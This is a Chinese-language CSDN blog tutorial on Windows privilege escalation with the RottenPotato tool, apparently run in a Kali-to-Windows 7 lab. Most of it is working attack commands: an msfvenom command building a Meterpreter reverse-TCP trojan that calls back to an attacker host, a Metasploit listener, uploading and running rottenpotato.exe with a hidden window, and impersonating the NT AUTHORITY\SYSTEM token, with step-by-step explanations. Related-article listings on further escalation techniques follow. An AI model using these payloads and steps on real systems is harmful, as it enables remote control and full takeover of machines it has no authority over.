windows操作系统提权之服务提权实战rottenpotato

已于 2024-06-01 21:10:00 修改
阅读量960 收藏 8
点赞数 33
分类专栏: 内网渗透 文章标签: 渗透测试 内网 提权 烂土豆
于 2024-06-01 18:35:41 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_80361487/article/details/139377445
版权
RottenPotato:
将服务帐户本地提权至SYSTEM
load incognito
list_tokens –u
upload /home/kali/Desktop rottenpotato.exe .
execute -Hc -f rottenpotato.exe
impersonate_token "NT AUTHORITY\SYSTEM"

  1. load incognito

    • 这条命令用于加载 Metasploit 的 incognito 模块,该模块提供了一系列与 Windows 令牌操作相关的功能,比如令牌窃取、令牌操纵等。

  2. list_tokens –u

    • list_token 命令用于列出当前会话中可用的访问令牌。-u 参数指定列出用户令牌,这些令牌代表系统中不同用户的访问权限。

  3. upload /home/kali/Desktop rottenpotato.exe .

    • upload 命令用于将文件从攻击者的机器上传到目标机器。这里尝试上传 /root/rottenpotato.exe 文件到当前 Meterpreter 会话的工作目录。
    • 这条命令的意思是将位于 /home/kali/Desktop/ 目录下的 rottenpotato.exe 文件上传到 Meterpreter 会话的当前工作目录。如果当前工作目录是目标机器上的根目录,那么文件将被上传到那里

  4. execute -Hc -f rottenpotato.exe

    • execute 命令用于在目标机器上执行一个程序。-Hc 参数指定隐藏控制台窗口,-f 参数指定执行指定的文件(这里是 rottenpotato.exe)。

  5. impersonate_token "NT AUTHORITY\SYSTEM"

    • impersonate_token 命令用于模拟一个特定的访问令牌,从而获得该令牌的权限。这里指定模拟的是具有最高权限的系统令牌 NT AUTHORITY\SYSTEM

Meterpreter 会话输出中,list_tokens -u 命令被用来列出当前会话中可用的用户令牌。下面是输出结果的解释:

  1. Delegation Tokens Available:

    • 这部分列出了可用于委派的令牌。委派令牌允许一个服务代表另一个服务执行操作,通常用于服务之间的信任关系。
    • 在这个例子中,有一个用户令牌属于 GOD\Administrator,这意味着目标机器上的 Administrator 用户账户的令牌是可用的,并且可以被用来进行令牌窃取或模拟。

  2. Impersonation Tokens Available:

    • 这部分列出了可用于模拟的令牌。模拟令牌允许一个进程以另一个用户的身份执行操作。
    • 在这个例子中,显示 "No tokens available",这意味着当前没有可用的模拟令牌。

当你在渗透测试或安全评估中使用 Meterpreter 时,这些信息非常有用,因为它们可以帮助你确定可以利用哪些账户的权限来提升你的会话权限或执行特定的任务。

具体流程

1.生成木马并放到win7上

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.247.130 LPORT=4444 -f exe >test.exe  

2.msfconsole进行监听

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.247.130
set LPORT 4444
exploit

3.加载 Metasploit 的 incognito 模块

load incognito

4.列出当前会话中可用的访问令牌

list_tokens –u

 5.将烂土豆从攻击者的机器上传到目标机器

upload /home/kali/Desktop rottenpotato.exe .

6.查看目录烂土豆是否上传成功 

7.将烂土豆执行

execute -Hc -f rottenpotato.exe

8. 模拟一个特定的访问令牌,从而获得该令牌的权限。这里指定模拟的是具有最高权限的系统令牌 NT AUTHORITY\SYSTEM

impersonate_token "NT AUTHORITY\SYSTEM"

9. 再次列出当前会话中可用的访问令牌

list_tokens –u

与第四步对比少了一句

[-] Warning: Not currently running as SYSTEM, not all tokens will be available
             Call rev2self if primary process token is SYSTEM
证明已经提权成功

10.显示当前 Meterpreter 会话的运行用户(权限)

getuid

网安+硬件
关注
  • 33
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
系统提权之:Windows 提权
f_carey的博客
11-04 1304
郑重声明: 本笔记编写目的只用于安全知识提升,并与更多人共享安全知识,切勿使用笔记中的技术进行违法活动,利用笔记中的技术造成的后果与作者本人无关。倡导维护网络安全人人有责,共同维护网络文明和谐。 Windows 提权1 利用漏洞提权1.1 手工查找系统缺失补丁1.2 Windows 补丁审计工具1.2.1 Windows-Exploit-Suggester1.2.2 Sherlock1.3 MSF 模块查找可利用漏洞2 利用 Windows 配置错误提权2.1 系统服务权限配置错误2.1.1 利用 Po.
系统提权之:Unix 提权
f_carey的博客
08-28 577
郑重声明: 本笔记编写目的只用于安全知识提升,并与更多人共享安全知识,切勿使用笔记中的技术进行违法活动,利用笔记中的技术造成的后果与作者本人无关。倡导维护网络安全人人有责,共同维护网络文明和谐。 系统提权之:Unix 提权1 Unix 内核漏洞提权1.1 利用前提1.2 利用 NC 建立 Shell 会话(便于操作)1.2.1 本地配置 NC 监听1.2.2 上传 perl-reverse-shell.pl 反弹 Shell1.3 查询 Unitx 系统内核信息1.4 查找内核版本对应的提权 EXP1..
rottenpotato.exe
10-26
非常稀有的tomato.exe提取exp,iis7.5可以使用。ctf比赛使用。
RottenPotato, RottenPotato本地特权从服务帐户升级到系统.zip
09-17
RottenPotato, RottenPotato本地特权从服务帐户升级到系统 这里代码不再维护- 对于新的实现,请参阅 https://github.com/breenmachine/RottenPotatoNG RottenPotatoWindows 服务帐户升级到系统的本地特权升级有关这里开发的技术概述,
windows提权土豆(RottenPotato)及Juicy Potato提权
热门推荐
negnegil的博客
09-11 1万+
介绍 土豆(Rotten Potato) MS16-075 提权是一个本地提权,只针对本地用户,不支持域用户 适用版本:Windows 7、8、10、2008、2012 土豆下载地址: https://github.com/foxglovesec/Potato 土豆提权原理: 欺骗 “NT AUTHORITY\SYSTEM”账户通过NTLM认证到我们控制的TCP终端。 对这个认证过程使用中间人攻击(NTLM重放),为“NT AUTHORITY\SYSTEM”账户本地协商一个安全令牌。这个过程是通
Juicy Potato本地特权提升工具(RottenPotatoNG加强版)
systemino的博客
04-22 1325
RottenPotatoNG及其变体利用了基于在127.0.0.1:6666上具有MiTM侦听器的BITS服务,以及当你拥有SeImpersonate或SeAssignPrimaryToken权限时的特权提升链。 概要 Juicy Potato是一个本地特权提升工具,是RottenPotatoNG的加强版。RottenPotatoNG及其变体利用了基于在127.0.0.1:6666上具有MiT...
Windows操作系统提权之系统服务漏洞提权Always Install Elevated
2301_80361487的博客
06-01 675
1.形成原因1.形成原因任意用户以NT AUTHORITY\SYSTEM权限安装 i。AlwaysInstallElevated是一个策略设置,当在系统中使用Windows Installer安装任何程序时,该参数允许非特权用户以system权限运行MSI文件。如果目标系统上启用了这一设置,我们可以使用msf生成msi文件来以system权限执行任意payload。MSI:Microsoft Silent Installer,是微软的安装包格式,它在后台运行.exe安装程序。
MySQL提权之UDF提权
2301_76227305的博客
06-08 842
udf 全称为'user defined function',意思是'用户自定义函数'。用户可以对数据库所使用的函数进行一个扩展(windows利用dll文件,linux利用so文件),那么我们就可以利用这个特点,往MySQL里面添加一个可以执行系统命令的函数即可。udf提权本质就是通过添加自定义函数让MySQL能执行系统命令,仅此而已。最后,以上仅为个人的拙见,如何有不对的地方,欢迎各位师傅指正与补充,有兴趣的师傅可以一起交流学习。
系统提权——Windows系统提权
JulySec的博客
02-13 1984
系统提权——Windows系统提权。 1、使用系统自带命令提权; 2、进程注入; 3、令牌窃取; 4、DLL劫持; 5、不安全的服务配置。 UAC机制的绕过
mssql数据库提权之——xp_cmdshell执行系统命令
01-19
1.MSSQL在Windows server类的操作系统上,默认具有system权限。System权限在Windows server2003中权限仅比管理员小;而在2003以上的版本,则为最高权限。 2.获取webshell之后可尝试在服务器各个站点的目录寻找sa的...
提权手工处理
03-24
提权手工处理
企业智权之管理.pdf
09-30
企业智权之管理.pdf
着作权之国际保护
12-22
《着作权之国际保护》是一份深入探讨全球范围内着作权法律保护的参考资料,对于从事创作、出版、版权交易或知识产权法务等相关工作的人士来说,具有极高的学习和参考价值。这份文档可能涵盖了以下几个核心知识点: ...
基于C++实现哈夫曼树huffman.zip
05-10
它是根据哈夫曼编码理论构建的一种特殊的二叉树结构,具有“最小带权路径长度”的特性,即树中从根节点到每个叶子节点的所有路径上的边权之和是最小的。这种树在数据编码、文本压缩等领域有着广泛的应用。 C++是一...
Windows提权之mysql数据库提权(UDF提权)
mrx56的博客
03-31 3093
可通过sqlmap或者msf获取udf文件。
C语言编写简易学生管理系统
最新发布
07-08
C语言编写简易学生管理系统
09--深海声传播信道和目标被动定位研究现状(杨坤德,李辉,段睿).pdf
07-08
09--深海声传播信道和目标被动定位研究现状(杨坤德,李辉,段睿).pdf
python怎样计算 Louvain组群划分算法结果的modularity
08-29
在使用Python计算时,需要统计出每个社区内的边权之和和所有边权之和,然后使用上述公式计算出modularity的值。 例如,如果要计算一个图的modularity,可以使用以下代码: ``` import networkx as nx # 加载图 G ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

网安+硬件

生活不易,但愿极客精神与你同在

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值